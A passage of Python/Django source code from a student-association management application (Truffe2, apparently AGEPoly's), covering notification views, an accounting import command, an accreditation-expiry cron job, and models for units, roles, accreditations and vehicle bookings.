for key in keys:
cindex = regrouped_keys
subkeys = key['key'].split('.')
pathkey = ''
for skey in subkeys:
if not pathkey:
pathkey = skey
else:
pathkey = u'{}.{}'.format(pathkey, skey)
if 'subkeys' not in cindex:
cindex['subkeys'] = {}
if 'unread_count' not in cindex:
cindex['unread_count'] = 0
if skey not in cindex['subkeys']:
cindex['subkeys'][skey] = {}
cindex['unread_count'] += key['nb_unread']
cindex = cindex['subkeys'][skey]
cindex['pathkey'] = pathkey
if 'unread_count' not in cindex:
cindex['unread_count'] = 0
if 'level_keys' not in cindex:
cindex['level_keys'] = []
key['last_key'] = subkeys[-1]
cindex['level_keys'].append(key)
cindex['unread_count'] += key['nb_unread']
def cleanup_keys(cindex, papa=None):
modif = False
for ___, subkey in cindex.get('subkeys', {}).items():
modif = modif or cleanup_keys(subkey, cindex)
if papa:
for kindex, subkey in cindex.get('subkeys', {}).items():
if subkey.get('subkeys'): # Clean only if subkey has no subkeys
continue
if subkey.get('level_keys') and len(subkey['level_keys']) == 1: # If the subkey has only one key
if 'level_keys' not in cindex:
cindex['level_keys'] = []
alone_key = subkey['level_keys'][0]
if not alone_key.get('already_movedup'):
alone_key['already_movedup'] = True
else:
alone_key['last_key'] = u'{}.{}'.format(kindex, alone_key.get('last_key'))
# Move the key up
cindex['level_keys'].append(alone_key)
# Remove the subkey
del cindex['subkeys'][kindex]
modif = True
return modif
while cleanup_keys(regrouped_keys):
pass
all_unread = Notification.objects.filter(user=request.user, seen=False).count()
return render(request, 'notifications/center/keys.html', {'keys': regrouped_keys, 'current_type': request.GET.get('current_type'), 'all_unread': all_unread})
@login_required
@csrf_exempt
def notification_json(request):
"""Json for notifications"""
current_type = request.GET.get('current_type')
if current_type:
bonus_filter = lambda x: x.filter(key__startswith=current_type, user=request.user)
else:
bonus_filter = lambda x: x.filter(user=request.user)
return generic_list_json(request, Notification, ['creation_date', 'key', 'linked_object', 'pk', 'pk'], 'notifications/center/json.html', bonus_filter_function=bonus_filter)
@login_required
def notification_restrictions(request):
key = request.GET.get('current_type')
if not key or Notification.objects.filter(user=request.user, key=key).exists():
notification_restriction, __ = NotificationRestriction.objects.get_or_create(user=request.user, key=key)
else:
notification_restriction = None
return render(request, 'notifications/center/restrictions.html', {'key': key, 'notification_restriction': notification_restriction})
@login_required
def notification_restrictions_update(request):
key = request.GET.get('current_type')
notification_restriction, __ = NotificationRestriction.objects.get_or_create(user=request.user, key=key)
notification_restriction.no_email = request.GET.get('mail') == 'true'
notification_restriction.autoread = request.GET.get('mute') == 'true'
notification_restriction.no_email_group = request.GET.get('no_group') == 'true'
if notification_restriction.autoread and not notification_restriction.no_email:
if 'mail' in request.GET.get('elem'):
notification_restriction.autoread = False
else:
notification_restriction.no_email = True
notification_restriction.save()
return HttpResponse()
@login_required
def mark_as_read(request):
"""Display the downdown menu for notificatoins"""
notification = get_object_or_404(Notification, pk=request.GET.get('pk'), user=request.user)
notification.seen = True
notification.seen_date = now()
notification.save()
return HttpResponse('')
```
#### File: management/commands/import_compta.py
```python
from django.contrib.contenttypes.models import ContentType
from django.core.management.base import BaseCommand, CommandError
from django.utils.timezone import now
from accounting_core.models import CostCenter, AccountingYear, Account
from accounting_main.models import AccountingLine, AccountingLineLogging, AccountingError, AccountingErrorLogging
from users.models import TruffeUser
import json
import os
import sys
import datetime
import pytz
class Command(BaseCommand):
help = 'Import compta'
def handle(self, *args, **options):
data = json.loads(sys.stdin.read())
root_user = TruffeUser.objects.get(username=185952)
paris_tz = pytz.timezone("Europe/Paris")
status_mapping = {'wai': '0_imported', 'oky': '1_validated', 'err': '2_error'}
line_mapping = {}
for line_data in data['lignes']:
try:
ay = AccountingYear.objects.get(name=line_data['year'])
except:
print u"AccountingYear not found !!", line_data['year']
ay = None
if ay:
try:
costcenter = CostCenter.objects.get(account_number=line_data['numero'], accounting_year=ay)
except:
print u"CostCenter not found !!", line_data['numero']
costcenter = None
if costcenter:
try:
account = Account.objects.get(account_number=line_data['compte'], accounting_year=ay)
except:
print u"Account not found !!", line_data['compte']
account = None
if account:
date = paris_tz.localize(datetime.datetime.strptime(line_data['date'], '%Y-%m-%d'))
line, created = AccountingLine.objects.get_or_create(costcenter=costcenter, accounting_year=ay, status=status_mapping[line_data['status']], account=account, date=date, tva=0, text=line_data['texte'], output=line_data['debit'], input=line_data['credit'], current_sum=line_data['situation'])
if created:
print "(+/", created, ")", line
AccountingLineLogging(object=line, who=root_user, what='created').save()
line_mapping[line_data['pk']] = line
for error_data in data['errors']:
try:
ay = AccountingYear.objects.get(name=error_data['year'])
except:
print u"AccountingYear not found !!", error_data['year']
ay = None
if ay:
try:
costcenter = CostCenter.objects.get(account_number=error_data['numero'], accounting_year=ay)
except:
print u"CostCenter not found !!", error_data['numero']
costcenter = None
if costcenter:
date = paris_tz.localize(datetime.datetime.strptime(error_data['date'], '%Y-%m-%d %H:%M:%S'))
if error_data['ligne']:
line = line_mapping[error_data['ligne']]
else:
line = None
error, created = AccountingError.objects.get_or_create(costcenter=costcenter, accounting_year=ay, status='0_drafting', linked_line=line, initial_remark=error_data['texte'])
try:
user = TruffeUser.objects.get(username=error_data['creator'])
except:
print "(!) User not found", error_data['creator']
user = root_user
if created:
print "(+/", created, ")", error
ael = AccountingErrorLogging(object=error, who=user, when=date, what='created')
ael.save()
# Hack pour forcer la date
ael.when = date
ael.save()
```
#### File: management/commands/cron_accreds.py
```python
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils.timezone import now
import datetime
from notifications.utils import notify_people
from units.models import Unit, AccreditationLog
from users.models import TruffeUser
class Command(BaseCommand):
help = 'Do accreds timeout-related-stuff who should be done dailly'
def handle(self, *args, **options):
days_before_warnings = [30, 15, 7, 3, 2, 1]
system_user = TruffeUser.objects.get(pk=settings.SYSTEM_USER_PK)
# On travaille par unité
for u in Unit.objects.filter(deleted=False):
# Les destinataires
dest_users = u.users_with_access('INFORMATIQUE', no_parent=True)
to_warning = {}
for d in days_before_warnings:
to_warning[d] = []
to_delete = []
# Toutes les accreds encore valides
for a in u.accreditation_set.filter(end_date=None):
# Nombre de jours avant l'expiration
delta = ((a.renewal_date + datetime.timedelta(days=365)) - now()).days
# Faut-il supprimer l'accred ?
if delta <= 0:
a.end_date = now()
a.save()
AccreditationLog(accreditation=a, who=system_user, what='autodeleted').save()
to_delete.append(a)
# Faut-il prévenir les responsables ?
if delta in days_before_warnings:
to_warning[delta].append(a)
for d in days_before_warnings:
if to_warning[d]:
notify_people(None, 'Accreds.Warning', 'accreds_warning', u, dest_users, {'jours': d, 'accreds': map(lambda a: {'pk': a.pk, 'user': str(a.user), 'role': str(a.role)}, to_warning[d])})
if to_delete:
notify_people(None, 'Accreds.Deleted', 'accreds_deleted', u, dest_users, {'accreds': map(lambda a: {'pk': a.pk, 'user': str(a.user), 'role': str(a.role)}, to_delete)})
```
#### File: truffe2/units/models.py
```python
from django.conf import settings
from django.db import models
from django.db.models import Q
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from generic.models import GenericModel, FalseFK, SearchableModel
from rights.utils import AgepolyEditableModel, UnitEditableModel
from users.models import TruffeUser
import datetime
from multiselectfield import MultiSelectField
class _Unit(GenericModel, AgepolyEditableModel, SearchableModel):
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = 'INFORMATIQUE'
world_ro_access = True
name = models.CharField(max_length=255)
id_epfl = models.CharField(max_length=64, blank=True, null=True, help_text=_(u'Utilisé pour la synchronisation des accréditations'))
description = models.TextField(blank=True, null=True)
url = models.URLField(blank=True, null=True)
is_commission = models.BooleanField(default=False, help_text=_(u'Cocher si cette unité est une commission de l\'AGEPoly'))
is_equipe = models.BooleanField(default=False, help_text=_(u'Cocher si cette unité est une équipe de l\'AGEPoly'))
is_hidden = models.BooleanField(default=False, help_text=_(u'Cocher rend l\'unité inselectionnable au niveau du contexte d\'unité, sauf pour les administrateurs et les personnes accréditées comité de l\'AGEPoly'))
parent_hierarchique = models.ForeignKey('Unit', blank=True, null=True, help_text=_(u'Pour les commissions et les équipes, sélectionner le comité de l\'AGEPoly. Pour les sous-commisions, sélectionner la commission parente. Pour un coaching de section, sélectionner la commission Coaching. Pour le comité de l\'AGEPoly, ne rien mettre.'))
class MetaData:
list_display = [
('name', _('Nom')),
('is_commission', _('Commission ?')),
('is_equipe', _(u'Équipe ?')),
('is_hidden', _(u'Cachée ?')),
('parent_hierarchique', _('Parent')),
('president', _(u'Président'))
]
details_display = [
('name', _('Nom')),
('is_commission', _('Commission ?')),
('is_equipe', _(u'Équipe ?')),
('is_hidden', _(u'Cachée ?')),
('parent_hierarchique', _('Parent')),
('president', _(u'Président')),
('id_epfl', _('ID EPFL')),
('description', _('Description')),
('url', _('URL')),
]
default_sort = "[1, 'asc']" # name
yes_or_no_fields = ['is_commission', 'is_equipe', 'is_hidden']
filter_fields = ('name', )
base_title = _(u'Unités')
list_title = _(u'Liste de toutes les unités')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-group'
menu_id = 'menu-units-units'
help_list = _(u"""Les unités sont les différents groupes de l'AGEPoly (Comité de l'AGEPoly, commissions, équipes, etc.)
Les unités sont organisées en arbre hiérarchique, avec le Comité de l'AGEPoly au sommet.""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'unité équipe'
fields = [
'name',
]
class Meta:
abstract = True
def __unicode__(self):
return self.name
def genericFormExtraInit(self, form, current_user, *args, **kwargs):
"""Update queryset for parent_hierarchique"""
if 'parent_hierarchique' in form.fields:
from units.models import Unit
form.fields['parent_hierarchique'].queryset = Unit.objects.order_by('name')
def rights_can_select(self):
"""Return true if the unit can be selected in the selector menu"""
return True
_rights_can_select = lambda unit: True
def set_rights_can_select(self, f):
def __tmp():
return f(self)
self.rights_can_select = __tmp
self._rights_can_select = f
def rights_can_edit(self):
"""Return true if the user has edit right"""
return True
_rights_can_edit = lambda unit: True
def set_rights_can_edit(self, f):
def __tmp():
return f(self)
self.rights_can_edit = __tmp
self._rights_can_edit = f
_can_use_hidden = False # Internal property
def check_if_can_use_hidden(self, user):
self._can_use_hidden = user.is_superuser or self.rights_in_root_unit(user)
return self._can_use_hidden
def has_sub(self):
"""Return true if the unit has subunits"""
liste = self.unit_set.filter(deleted=False)
if not self._can_use_hidden:
liste = liste.filter(is_hidden=False)
return liste.count() > 0
def only_one_sub_type(self):
tt = 0
if self.sub_com():
tt += 1
if self.sub_eqi():
tt += 1
if self.sub_grp():
tt += 1
return tt == 1
def sub_com(self):
"""Return the sub units, but only commissions"""
retour = []
liste = self.unit_set.filter(is_commission=True, deleted=False)
if not self._can_use_hidden:
liste = liste.filter(is_hidden=False)
for unit in liste.order_by('name'):
unit.set_rights_can_select(self._rights_can_select)
unit.set_rights_can_edit(self._rights_can_edit)
unit._can_use_hidden = self._can_use_hidden
retour.append(unit)
return retour
def sub_eqi(self):
"""Return the sub units, but only groups"""
retour = []
liste = self.unit_set.exclude(is_commission=True).filter(is_equipe=True, deleted=False)
if not self._can_use_hidden:
liste = liste.filter(is_hidden=False)
for unit in liste.order_by('name'):
unit.set_rights_can_select(self._rights_can_select)
unit.set_rights_can_edit(self._rights_can_edit)
unit._can_use_hidden = self._can_use_hidden
retour.append(unit)
return retour
def sub_grp(self):
"""Return the sub units, without groups or commissions"""
retour = []
liste = self.unit_set.filter(is_commission=False, is_equipe=False, deleted=False)
if not self._can_use_hidden:
liste = liste.filter(is_hidden=False)
for unit in liste.order_by('name'):
unit.set_rights_can_select(self._rights_can_select)
unit.set_rights_can_edit(self._rights_can_edit)
unit._can_use_hidden = self._can_use_hidden
retour.append(unit)
return retour
def is_user_in_groupe(self, user, access=None, parent_mode=False, no_parent=False):
for accreditation in self.accreditation_set.filter(user=user, end_date=None):
if accreditation.is_valid():
# No acces: Only an accred is needed
if not access:
return True
# If role has acces, ok
if accreditation.role.access:
if type(access) is list:
for acc in access:
if acc in accreditation.role.access:
return True
elif access in accreditation.role.access:
return True
# Check valid delegations for this accred
access_delegations = self.accessdelegation_set.filter((Q(user=user) | Q(user=None)) & (Q(role=accreditation.role) | Q(role=None))).exclude(deleted=True)
for access_delegation in access_delegations:
if not parent_mode or access_delegation.valid_for_sub_units:
if type(access) is list:
for acc in access:
if acc in access_delegation.access:
return True
elif access in access_delegation.access:
return True
if self.parent_hierarchique and not no_parent:
return self.parent_hierarchique.is_user_in_groupe(user, access, True)
return False
def users_with_access(self, access=None, no_parent=False):
retour = []
for accreditation in self.accreditation_set.filter(end_date=None):
if not accreditation.is_valid():
continue
if accreditation.user in retour:
continue
if not access or self.is_user_in_groupe(accreditation.user, access, no_parent=no_parent): # To avoid duplicate code, check if access with other function
retour.append(accreditation.user)
return retour
@property
def president(self):
return ', '.join([u.user.get_full_name() for u in list(self.accreditation_set.filter(end_date=None, role__pk=settings.PRESIDENT_ROLE_PK, hidden_in_truffe=False))])
def can_delete(self):
if self.accreditation_set.count():
return (False, _(u'Au moins une accéditation existe avec cette unité, impossible de supprimer l\'unité (NB: Historique compris).'))
return (True, None)
def current_accreds(self):
return self.accreditation_set.filter(end_date=None).order_by('role__order', 'user__first_name', 'user__last_name')
def get_users(self):
return [a.user for a in self.current_accreds()]
def rights_can_SHOW(self, user):
if self.is_hidden and not self.check_if_can_use_hidden(user):
return False
return super(_Unit, self).rights_can_SHOW(user)
class _Role(GenericModel, AgepolyEditableModel, SearchableModel):
"""Un role, pour une accred"""
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = 'INFORMATIQUE'
world_ro_access = True
name = models.CharField(max_length=255)
id_epfl = models.CharField(max_length=255, null=True, blank=True, help_text=_(u'Mettre ici l\'ID accred du rôle pour la synchronisation EPFL'))
description = models.TextField(null=True, blank=True)
order = models.IntegerField(null=True, blank=True, help_text=_(u'Il n\'est pas possible d\'accréditer la même personne dans la même unité plusieurs fois. Le rôle avec le plus PETIT ordre sera pris en compte'))
need_validation = models.BooleanField(_(u'Nécessite validation'), default=False, help_text=_(u'A cocher pour indiquer que le comité de l\'AGEPoly doit valider l\'attribution du rôle'))
ACCESS_CHOICES = (
('PRESIDENCE', _(u'Présidence')),
('TRESORERIE', _(u'Trésorerie')),
('COMMUNICATION', _('Communication')),
('INFORMATIQUE', _('Informatique')),
('ACCREDITATION', _(u'Accréditations')),
('LOGISTIQUE', _('Logistique')),
('SECRETARIAT', _(u'Secrétariat')),
('COMMISSIONS', _(u'Commissions'))
)
access = MultiSelectField(choices=ACCESS_CHOICES, blank=True, null=True)
def __unicode__(self):
return self.name
def get_access(self):
if self.access:
return u', '.join(list(self.access))
def __init__(self, *args, **kwargs):
super(_Role, self).__init__(*args, **kwargs)
self.MetaRights = type("MetaRights", (self.MetaRights,), {})
self.MetaRights.rights_update({
'DISPLAY_ACTIVE_USERS': _(u'Peut afficher la liste des gens possédant l\'accréditation'),
})
def rights_can_DISPLAY_ACTIVE_USERS(self, user):
if user.is_superuser:
return True
return self.rights_in_root_unit(user, 'INFORMATIQUE')
class MetaData:
list_display = [
('name', _('Nom')),
('id_epfl', _('ID EPFL ?')),
('need_validation', _('Validation ?')),
('order', _('Ordre'))
]
details_display = [
('name', _('Nom')),
('description', _('Description')),
('id_epfl', _('ID EPFL ?')),
('need_validation', _('Validation ?')),
('order', _('Ordre')),
('get_access', _(u'Accès')),
]
default_sort = "[1, 'asc']" # name
filter_fields = ('name', 'id_epfl', 'description')
yes_or_no_fields = ['need_validation']
base_title = _(u'Rôles')
list_title = _(u'Liste de tous les rôles')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-group'
menu_id = 'menu-units-roles'
help_list = _(u"""Les rôles sont les différents type d'accréditations possibles pour une unité.
Certains rôles donnent des accès particuliers.
Par exemple, le rôle 'Trésorier' donne l'accès TRÉSORERIE. Les droits sont gérés en fonction des accès !""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'rôle role roles'
fields = [
'name',
'description',
'get_access',
]
class Meta:
abstract = True
def can_delete(self):
if self.accreditation_set.count():
return (False, _(u'Au moins une accréditation existe avec ce rôle, impossible de supprimer le rôle (NB: Historique compris)'))
return (True, None)
class Accreditation(models.Model, UnitEditableModel, SearchableModel):
unit = models.ForeignKey('Unit')
user = models.ForeignKey(TruffeUser)
role = models.ForeignKey('Role')
start_date = models.DateTimeField(auto_now_add=True)
end_date = models.DateTimeField(blank=True, null=True)
renewal_date = models.DateTimeField(auto_now_add=True)
display_name = models.CharField(_(u'Titre'), max_length=255, blank=True, null=True, help_text=_(u'Précision optionnelle à afficher dans Truffe. Peut être utilisé pour préciser la fonction, par exemple: "Responsable Réseau" pour une accréditation de Responsable Informatique.'))
no_epfl_sync = models.BooleanField(_(u'Désactiver syncronisation EPFL'), default=False, help_text=_(u'A cocher pour ne pas synchroniser cette accréditation au niveau EPFL'))
hidden_in_epfl = models.BooleanField(_(u'Cacher au niveau EPFL'), default=False, help_text=_(u'A cocher pour ne pas rendre public l\'accréditation au niveau EPFL'))
hidden_in_truffe = models.BooleanField(_(u'Cacher dans Truffe'), default=False, help_text=_(u'A cocher pour ne pas rendre public l\'accréditation au niveau truffe (sauf aux accréditeurs sur la page d\'accréditation)'))
need_validation = models.BooleanField(default=False)
class MetaRightsUnit(UnitEditableModel.MetaRightsUnit):
unit_ro_access = True
access = 'ACCREDITATION'
class MetaRights(UnitEditableModel.MetaRights):
linked_unit_property = 'unit'
def __init__(self, *args, **kwargs):
super(Accreditation, self).__init__(*args, **kwargs)
self.MetaRights.rights_update({
'INGORE_PREZ': _(u'Peut supprimer le dernier président'),
'VALIDATE': _(u'Valider les changements'),
'SHOW_ON_PROFILE': _(u'Afficher l\'accréditation sur le profil de l\'utilisateur'),
})
def exp_date(self):
"""Returne la date d'expiration de l'accred"""
return self.renewal_date + datetime.timedelta(days=365)
def is_valid(self):
"""Returne true si l'accred est valide"""
return self.end_date is None
def get_role_or_display_name(self):
if self.display_name:
return u'%s (%s)' % (self.role, self.display_name)
return u'%s' % (self.role,)
def rights_can_INGORE_PREZ(self, user):
return self.rights_in_root_unit(user, self.MetaRightsUnit.access)
def rights_can_VALIDATE(self, user):
return self.rights_in_root_unit(user, self.MetaRightsUnit.access)
def rights_can_SHOW(self, user):
if self.hidden_in_truffe:
return self.rights_in_root_unit(user, self.MetaRightsUnit.access) and super(Accreditation, self).rights_can_SHOW(user)
else:
return super(Accreditation, self).rights_can_SHOW(user)
def rights_can_SHOW_ON_PROFILE(self, user):
if self.hidden_in_truffe:
return self.rights_can_SHOW(user)
return True # Everone can see others people's accreds
def check_if_validation_needed(self, request):
if not self.role.need_validation:
return
if self.rights_can('VALIDATE', request.user):
return
if not self.unit.is_commission: # Seulement pour les commisions !
return
self.need_validation = True
from notifications.utils import notify_people
dest_users = self.people_in_root_unit('ACCREDITATION')
for user in self.people_in_root_unit('COMMISSIONS'):
if user not in dest_users:
dest_users.append(user)
notify_people(request, 'Accreds.ToValidate', 'accreds_tovalidate', self, dest_users)
def __unicode__(self):
return u'{} ({})'.format(self.user, self.get_role_or_display_name())
def display_url(self):
return '%s?upk=%s' % (reverse('units.views.accreds_list'), self.unit.pk,)
class MetaData:
base_title = _(u'Accréditation')
elem_icon = 'fa fa-key'
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'accred'
last_edit_date_field = 'renewal_date'
fields = [
'user',
'role',
'display_name',
]
class AccreditationLog(models.Model):
accreditation = models.ForeignKey(Accreditation)
who = models.ForeignKey(TruffeUser)
when = models.DateTimeField(auto_now_add=True)
what = models.TextField(blank=True, null=True)
TYPE_CHOICES = [
('created', _(u'Créée')),
('edited', _(u'Modifiée')),
('deleted', _(u'Supprimée')),
('autodeleted', _(u'Supprimée automatiquement')),
('renewed', _(u'Renouvelée')),
('validated', _(u'Validée')),
('autocreated', _(u'Créée automatiquement')),
]
type = models.CharField(max_length=32, choices=TYPE_CHOICES)
class _AccessDelegation(GenericModel, UnitEditableModel):
unit = FalseFK('units.models.Unit')
access = MultiSelectField(choices=_Role.ACCESS_CHOICES, blank=True, null=True)
valid_for_sub_units = models.BooleanField(_(u'Valide pour les sous-unités'), default=False, help_text=_(u'Si sélectionné, les accès supplémentaires dans l\'unité courante seront aussi valides dans les sous-unités'))
user = models.ForeignKey(TruffeUser, blank=True, null=True, help_text=_(u'(Optionnel !) L\'utilisateur concerné. L\'utilisateur doit disposer d\'une accréditation dans l\'unité.'))
role = FalseFK('units.models.Role', blank=True, null=True, help_text=_(u'(Optionnel !) Le rôle concerné.'))
class MetaRightsUnit(UnitEditableModel.MetaRightsUnit):
unit_ro_access = True
access = 'ACCREDITATION'
class MetaData:
list_display = [
('get_display_list', ''),
('user', _('Utilisateur')),
('role', _(u'Rôle')),
('get_access', _(u'Accès'))
]
details_display = [
('user', _('Utilisateur')),
('role', _('Rôle')),
('get_access', _(u'Accès supplémentaires')),
('valid_for_sub_units', _(u'Valide pour les sous-unités'))
]
default_sort = "[0, 'asc']" # id
filter_fields = ('user__first_name', 'user__last_name','user__username', 'role__name', 'access')
not_sortable_columns = ['get_display_list', ]
base_title = _(u'Délégation d\'accès')
list_title = _(u'Liste de toutes les délégations d\'accès')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-group'
menu_id = 'menu-units-delegations'
yes_or_no_fields = ['valid_for_sub_units']
has_unit = True
help_list = _(u"""Les délégations d'accès permettent de donner des accès supplémentaires dans une unité.
Les accès sont normalement déterminés en fonction des accréditations, au niveau global.
Par exemple, une personne accréditée en temps que 'Trésorier' dans une unité disposera de l'accès TRESORERIE pour l'unité.
Avec les délégations d'accês, il est par exemple possible de donner l'accès "COMMUNICATION" à tout les membres d'une unité en créant une délégations d'accès.
Il est aussi possible de restreindre une délégation â un utilisateur ou à un rôle particulier.""")
class Meta:
abstract = True
def get_access(self):
if self.access:
return u', '.join(list(self.access))
def __unicode__(self):
return _(u'Accês supplémentaire n°%s' % (self.pk,))
def delete_signal(self, request):
self.save_signal()
def save_signal(self):
"""Cleanup rights"""
for user in self.unit.get_users():
user.clear_rights_cache()
def get_display_list(self):
return _(u'Délégation #{}'.format(self.pk))
```
#### File: truffe2/vehicles/models.py
```python
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django import forms
from django.shortcuts import get_object_or_404
from generic.models import GenericModel, GenericStateModel, FalseFK, GenericGroupsModel, GenericStateRootValidable, GenericGroupsModerableModel, GenericContactableModel, SearchableModel
from rights.utils import AgepolyEditableModel, UnitEditableModel
from users.models import TruffeUser
class _Provider(GenericModel, AgepolyEditableModel, SearchableModel):
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = ['LOGISTIQUE', 'SECRETARIAT']
world_ro_access = False
name = models.CharField(_('Nom'), max_length=255)
description = models.TextField(_('Description'))
class MetaData:
list_display = [
('name', _(u'Nom')),
]
details_display = list_display + [
('description', _(u'Description')),
]
default_sort = "[1, 'asc']" # name
filter_fields = ('name', 'description')
base_title = _(u'Fournisseurs')
list_title = _(u'Liste des fournisseurs')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-suitcase'
menu_id = 'menu-vehicles-provider'
help_list = _(u"""Les entreprises fournissant des services de locations de véhicules.""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'mobility véhicule'
fields = [
'name',
'description',
]
class Meta:
abstract = True
def __unicode__(self):
return self.name
def get_types(self):
return self.vehicletype_set.filter(deleted=False).order_by('name')
def get_cards(self):
return self.card_set.filter(deleted=False).order_by('name')
class _VehicleType(GenericModel, AgepolyEditableModel, SearchableModel):
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = ['LOGISTIQUE', 'SECRETARIAT']
world_ro_access = False
provider = FalseFK('vehicles.models.Provider', verbose_name=_('Fournisseur'))
name = models.CharField(_('Nom'), max_length=255)
description = models.TextField(_('Description'))
class MetaData:
list_display = [
('name', _(u'Nom')),
('provider', _(u'Fournisseur')),
]
details_display = list_display + [
('description', _(u'Description')),
]
default_sort = "[1, 'asc']" # name
filter_fields = ('name', 'description', 'provider__name')
base_title = _(u'Types de véhicule')
list_title = _(u'Liste des types de véhicules')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-truck'
menu_id = 'menu-vehicles-type'
help_list = _(u"""Les différents types de véhicules, par fournisseur""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'mobility véhicule'
fields = [
'name',
'description',
'provider',
]
class Meta:
abstract = True
def __unicode__(self):
return self.name
class _Card(GenericModel, AgepolyEditableModel, SearchableModel):
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = ['LOGISTIQUE', 'SECRETARIAT']
world_ro_access = False
provider = FalseFK('vehicles.models.Provider', verbose_name=_('Fournisseur'))
name = models.CharField(_('Nom'), max_length=255)
number = models.CharField(_(u'Numéro'), max_length=255)
description = models.TextField(_('Description'))
exclusif = models.BooleanField(_('Usage exclusif'), default=True, help_text=_(u'Ne peut pas être utilisé plusieurs fois en même temps ?'))
class MetaData:
list_display = [
('name', _(u'Nom')),
('provider', _(u'Fournisseur')),
('number', _(u'Numéro')),
]
details_display = list_display + [
('description', _(u'Description')),
('exclusif', _(u'Usage exclusif'))
]
default_sort = "[1, 'asc']" # name
yes_or_no_fields = ['exclusif']
filter_fields = ('name', 'number', 'description', 'provider__name')
base_title = _(u'Cartes')
list_title = _(u'Liste des cartes')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-credit-card'
menu_id = 'menu-vehicles-cards'
help_list = _(u"""Les différentes cartes utilisées pour les réservations""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'mobility véhicule'
fields = [
'name',
'description',
'provider',
'number',
]
class Meta:
abstract = True
def __unicode__(self):
return u'{} ({})'.format(self.name, self.number)
class _Location(GenericModel, AgepolyEditableModel, SearchableModel):
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = ['LOGISTIQUE', 'SECRETARIAT']
world_ro_access = False
name = models.CharField(_('Nom'), max_length=255)
description = models.TextField(_('Description'))
url_location = models.URLField(_('URL carte lieu'), blank=True, null=True)
class MetaData:
list_display = [
('name', _(u'Nom')),
]
details_display = list_display + [
('description', _(u'Description')),
('url_location', _(u'URL carte lieu')),
]
default_sort = "[1, 'asc']" # name
filter_fields = ('name', 'description')
base_title = _(u'Lieux')
list_title = _(u'Liste des lieux')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-location-arrow'
menu_id = 'menu-vehicles-location'
help_list = _(u"""Les lieux de récupération des locations""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'mobility véhicule'
fields = [
'name',
'description',
]
class Meta:
abstract = True
def __unicode__(self):
return self.name
class _Booking(GenericModel, GenericGroupsModerableModel, GenericGroupsModel, GenericContactableModel, GenericStateRootValidable, GenericStateModel, UnitEditableModel, SearchableModel):
class MetaRightsUnit(UnitEditableModel.MetaRightsUnit):
access = 'LOGISTIQUE'
moderation_access = 'SECRETARIAT'
unit = FalseFK('units.models.Unit')
title = models.CharField(_(u'Titre'), max_length=255)
responsible = models.ForeignKey(TruffeUser, verbose_name=_(u'Responsable'))
reason = models.TextField(_(u'Motif'))
remark = models.TextField(_(u'Remarques'), blank=True, null=True)
remark_agepoly = models.TextField(_(u'Remarques AGEPoly'), blank=True, null=True)
provider = FalseFK('vehicles.models.Provider', verbose_name=_(u'Fournisseur'))
vehicletype = FalseFK('vehicles.models.VehicleType', verbose_name=_(u'Type de véhicule'))
card = FalseFK('vehicles.models.Card', verbose_name=_(u'Carte'), blank=True, null=True)
location = FalseFK('vehicles.models.Location', verbose_name=_(u'Lieu'), blank=True, null=True)
start_date = models.DateTimeField(_(u'Début de la réservation'))
end_date = models.DateTimeField(_(u'Fin de la réservation'))
class MetaData:
list_display = [
('title', _('Titre')),
('start_date', _(u'Date début')),
('end_date', _('Date fin')),
('provider', _('Fournisseur')),
('vehicletype', _(u'Type de véhicule')),
('status', _('Statut')),
]
details_display = list_display + [
('responsible', _('Responsable')),
('reason', _('Motif')),
('remark', _('Remarques')),
('remark_agepoly', _('Remarques AGEPoly')),
('card', _('Carte')),
('get_location', _('Lieu')),
]
filter_fields = ('title', 'status')
base_title = _(u'Réservations de véhicule')
list_title = _(u'Liste de toutes les réservations de véhicules')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-ambulance'
default_sort = "[3, 'desc']" # end_date
forced_widths = {
'1': '25%',
'2': '140px', # start date
'3': '140px', # end date
}
forced_widths_related = {
'1': '15%',
'2': '25%',
'4': '150px', # start date
'5': '150px', # end date
}
menu_id = 'menu-vehicles-booking'
menu_id_calendar = 'menu-vehicles-booking-calendar'
menu_id_calendar_related = 'menu-vehicles-booking-calendar-related'
datetime_fields = ['start_date', 'end_date']
safe_fields = ['get_location']
has_unit = True
help_list = _(u"""Les réservations de véhicules te permettent de demander la location d'un véhicule pour ton unité.
Ils sont soumis à validation par le secrétariat de l'AGEPoly. Il faut toujours faire les réservations le plus tôt possible !""")
help_list_related = _(u"""La liste de toutes les réservations de véhicules.""")
@staticmethod
def extra_args_for_edit(request, current_unit, current_year):
from vehicles.models import Provider
return {'providers': Provider.objects.filter(deleted=False).order_by('name')}
class MetaEdit:
datetime_fields = ('start_date', 'end_date')
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'mobility véhicule réservation'
fields = [
'title',
'card',
'provider',
'location',
'vehicletype',
'responsible',
'remark',
'reason',
'remark_agepoly',
]
class MetaState(GenericStateRootValidable.MetaState):
states_texts = {
'0_draft': _(u'La réservation est en cours de création et n\'est pas publique.'),
'1_asking': _(u'La réservation est en cours de modération. Elle n\'est pas éditable. Sélectionner ce statut pour demander une modération !'),
'2_online': _(u'La résevation est validée. Elle n\'est pas éditable.'),
'3_archive': _(u'La réservation est archivée. Elle n\'est plus modifiable.'),
